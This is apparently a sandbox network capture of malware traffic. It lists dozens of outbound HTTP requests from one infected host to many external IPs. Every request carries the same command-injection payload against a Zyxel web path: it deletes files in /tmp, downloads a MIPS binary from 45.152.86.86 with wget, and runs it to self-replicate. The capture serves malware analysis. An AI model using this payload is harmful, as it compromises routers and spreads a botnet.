                                        Mar 31, 2024 09:22:44.880536079 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9117192.168.2.2337874216.249.19.108443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.880590916 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9118192.168.2.2338004117.4.253.122443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.880629063 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9119192.168.2.2337992140.66.155.27443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.880686045 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9120192.168.2.235799491.42.161.94443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.880734921 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9121192.168.2.2358310104.125.138.224443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.880770922 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9122192.168.2.236071471.72.137.34443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.880808115 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9123192.168.2.235688058.0.38.209443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.880858898 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9124192.168.2.233473676.146.238.169443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.880897045 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9125192.168.2.234155669.192.229.203443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.880932093 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9126192.168.2.2339962157.150.104.228443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.880987883 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9127192.168.2.2352184195.47.76.48443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.881036043 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9128192.168.2.234095042.245.124.207443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.881078959 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9129192.168.2.2335034159.42.18.133443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.881129980 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9130192.168.2.233857440.159.172.226443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.881170988 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9131192.168.2.2353724213.107.240.177443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.881208897 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9132192.168.2.2352560197.84.50.54443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.881238937 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9133192.168.2.2344516212.206.112.186443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.881299019 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9134192.168.2.2349912137.38.98.74443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.881347895 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9135192.168.2.2348894121.27.20.48443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.881387949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9136192.168.2.235155266.40.60.114443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.881428957 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9137192.168.2.233883478.31.198.173443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.881477118 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9138192.168.2.233954866.187.101.253443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.881511927 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9139192.168.2.234936614.127.11.124443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.881570101 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9140192.168.2.2359336197.120.147.207443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.881622076 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9141192.168.2.2348848102.160.36.88443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.881656885 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9142192.168.2.2357450131.39.88.79443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.881692886 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9143192.168.2.23366684.49.243.207443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.881746054 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9144192.168.2.2350112169.96.140.160443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.881777048 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9145192.168.2.235054414.148.182.169443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.881839037 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9146192.168.2.2349492177.136.73.218443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.881877899 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9147192.168.2.233416497.227.140.103443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.881917000 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9148192.168.2.234458888.25.100.231443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.881966114 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9149192.168.2.2349124156.26.102.59443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.882014036 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9150192.168.2.2340176175.73.253.169443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.882045031 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9151192.168.2.23539765.245.77.172443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.882103920 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9152192.168.2.2337564141.211.102.97443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.882155895 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9153192.168.2.234202097.71.62.125443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.882203102 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9154192.168.2.236016847.49.131.244443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.882251024 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9155192.168.2.2360114201.51.152.222443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.882288933 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9156192.168.2.2347898122.255.177.170443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.882348061 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9157192.168.2.2336726135.40.103.193443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.882405043 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9158192.168.2.2355894221.24.232.174443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.882450104 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9159192.168.2.2337602115.253.136.30443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.882500887 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9160192.168.2.2335050157.200.30.87443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.882543087 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9161192.168.2.235249058.150.132.121443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.882605076 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9162192.168.2.234846883.166.38.117443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.882652044 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9163192.168.2.2360828193.86.198.50443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.882693052 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9164192.168.2.2360796182.122.21.32443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.882745981 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9165192.168.2.2360446114.47.180.136443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.882787943 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9166192.168.2.2337258109.70.244.103443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.882837057 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9167192.168.2.2345582110.67.246.207443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.882879972 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9168192.168.2.2341972186.53.111.195443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.882936001 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9169192.168.2.2355642202.28.136.192443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.882975101 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9170192.168.2.235279097.146.234.18443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.883018970 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9171192.168.2.234259297.114.100.185443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.883070946 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9172192.168.2.234387052.241.168.49443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.883105040 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9173192.168.2.2335722125.88.95.213443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.883140087 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9174192.168.2.235493485.245.185.253443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.883191109 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9175192.168.2.235424870.205.101.48443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.883243084 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9176192.168.2.2356948147.178.249.164443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.883291960 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9177192.168.2.234531073.47.241.230443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.883326054 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9178192.168.2.23603022.78.30.42443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.883397102 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9179192.168.2.2350756110.252.98.191443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.883438110 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9180192.168.2.233565293.193.245.163443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.883491039 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9181192.168.2.2341036143.138.172.72443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.883547068 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9182192.168.2.2346934137.164.55.79443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.883588076 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9183192.168.2.2356436103.169.17.192443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.883636951 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9184192.168.2.2357674169.242.130.237443
                                        TimestampBytes transferredDirectionData
